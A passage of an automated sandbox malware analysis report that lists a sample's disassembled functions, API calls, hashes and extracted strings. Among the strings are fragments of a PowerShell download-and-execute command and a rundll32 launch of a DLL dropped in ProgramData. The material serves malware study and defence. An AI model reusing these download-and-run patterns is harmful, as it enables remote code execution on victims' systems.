                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        • API String ID: 2215929589-1989157005
                                                                                                                                                                        • Opcode ID: 6a35eb19195bd90cc256e193a31a5490b649ada9fe487f900dc45db066f586a2
                                                                                                                                                                        • Instruction ID: 6de3917ab42fe9102ee335993e8e2e95e886e0910ffd072f9bf795196fb49121
                                                                                                                                                                        • Opcode Fuzzy Hash: 6a35eb19195bd90cc256e193a31a5490b649ada9fe487f900dc45db066f586a2
                                                                                                                                                                        • Instruction Fuzzy Hash: 39419531D002299BDF12FBA4EC829CDBBB4EF29704F5181A6F554B7152DB70AE468F90
                                                                                                                                                                        Function 00195E39 Relevance: 10.6, APIs: 7, Instructions: 120stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00195EC8
                                                                                                                                                                          • Part of subcall function 00191D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00191DD2
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00195EE5
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00195F04
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00195F18
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00195F2B
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00195F3F
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00195F52
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00191D67: GetFileAttributesA.KERNEL32(?,?,?,0018DA54,?,?,?), ref: 00191D6E
                                                                                                                                                                          • Part of subcall function 00195B4D: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00195B72
                                                                                                                                                                          • Part of subcall function 00195B4D: HeapAlloc.KERNEL32(00000000), ref: 00195B79
                                                                                                                                                                          • Part of subcall function 00195B4D: wsprintfA.USER32 ref: 00195B92
                                                                                                                                                                          • Part of subcall function 00195B4D: FindFirstFileA.KERNEL32(?,?), ref: 00195BA9
                                                                                                                                                                          • Part of subcall function 00195B4D: StrCmpCA.SHLWAPI(?,001B6AA0), ref: 00195BCA
                                                                                                                                                                          • Part of subcall function 00195B4D: StrCmpCA.SHLWAPI(?,001B6AA4), ref: 00195BE4
                                                                                                                                                                          • Part of subcall function 00195B4D: wsprintfA.USER32 ref: 00195C0B
                                                                                                                                                                          • Part of subcall function 00195B4D: CopyFileA.KERNEL32(?,?,00000001), ref: 00195CC8
                                                                                                                                                                          • Part of subcall function 00195B4D: DeleteFileA.KERNEL32(?), ref: 00195CEB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1546541418-0
                                                                                                                                                                        • Opcode ID: f0430a7123c5a2207239041def5f3b18dd37013914119af974f80e408bed90f9
                                                                                                                                                                        • Instruction ID: 7995d2d7a98edcd306b3a845332765a8db06e173911983d488f2447db2b39643
                                                                                                                                                                        • Opcode Fuzzy Hash: f0430a7123c5a2207239041def5f3b18dd37013914119af974f80e408bed90f9
                                                                                                                                                                        • Instruction Fuzzy Hash: F951C9B5A0011C9BCF65DB64DC85ADDB7F9AB4C310F4444E6FA09E3250EB70AB898F54
                                                                                                                                                                        Function 0019FA72 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Name::operator+$NameName::
                                                                                                                                                                        • String ID: throw(
                                                                                                                                                                        • API String ID: 168861036-3159766648
                                                                                                                                                                        • Opcode ID: 1215b84ecf3e47d6f37de9e9d439bbc425903b9c90388ea284edf27c15c0c858
                                                                                                                                                                        • Instruction ID: f823cf4efe8886d1c4d70b3340e5b269aee4ba75cba35da78d3d6be22d07ca6d
                                                                                                                                                                        • Opcode Fuzzy Hash: 1215b84ecf3e47d6f37de9e9d439bbc425903b9c90388ea284edf27c15c0c858
                                                                                                                                                                        • Instruction Fuzzy Hash: 84019234640209BFCF04EBA4D846EEE7BB9EF54704F448069F505EB2A5DB70DA46C784
                                                                                                                                                                        Function 00193299 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strtok_s
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3330995566-0
                                                                                                                                                                        • Opcode ID: 1724f54abed4fd33d0a3431070f5284a64d576125f861060ecacf6f73e549b6b
                                                                                                                                                                        • Instruction ID: c8d5c50f98e8dadfc9b009d0d4fc9c581a17356ac923f845f59724d8295ad5f8
                                                                                                                                                                        • Opcode Fuzzy Hash: 1724f54abed4fd33d0a3431070f5284a64d576125f861060ecacf6f73e549b6b
                                                                                                                                                                        • Instruction Fuzzy Hash: C2319075E41205EFCF199FA4CC85B69BBACFF18705F22405AE816DB192DB34CB419B40
                                                                                                                                                                        Function 001956AF Relevance: 9.1, APIs: 6, Instructions: 107registrystringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 001956E4
                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?,?,00000000,?), ref: 00195704
                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 0019572A
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00195736
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00195765
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00195778
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3891774339-0
                                                                                                                                                                        • Opcode ID: f1193a71893b2deb19e163e0aeee8481d6ca13d761e8279cd13d85c2d508ed82
                                                                                                                                                                        • Instruction ID: ea760a5551a83c3c3a437b8bd5600cfcb4387e36000a7777b5563e874c24ecea
                                                                                                                                                                        • Opcode Fuzzy Hash: f1193a71893b2deb19e163e0aeee8481d6ca13d761e8279cd13d85c2d508ed82
                                                                                                                                                                        • Instruction Fuzzy Hash: D3415B7298001DAFCF16AB24EC86EE9777DBB28300F0004A6B509A3161EF705E85CF90
                                                                                                                                                                        Function 001929A2 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 00192BC4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                        • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                        • API String ID: 2215929589-2108736111
                                                                                                                                                                        • Opcode ID: 11177c928173af18e390ee26cbc14617d53fa21e473e9a15f238f5c44bc8c4b5
                                                                                                                                                                        • Instruction ID: 79345b9e935f392e680343a428a913c46b4bb7a8b31c42726cd5d413d694d95f
                                                                                                                                                                        • Opcode Fuzzy Hash: 11177c928173af18e390ee26cbc14617d53fa21e473e9a15f238f5c44bc8c4b5
                                                                                                                                                                        • Instruction Fuzzy Hash: 89719632D005299BDF12FFA4EC429CDB7B4AF29704F524061F960B7162DB70AE4A8F90
                                                                                                                                                                        Function 0018826D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 130memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 0018830C
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 00188341
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
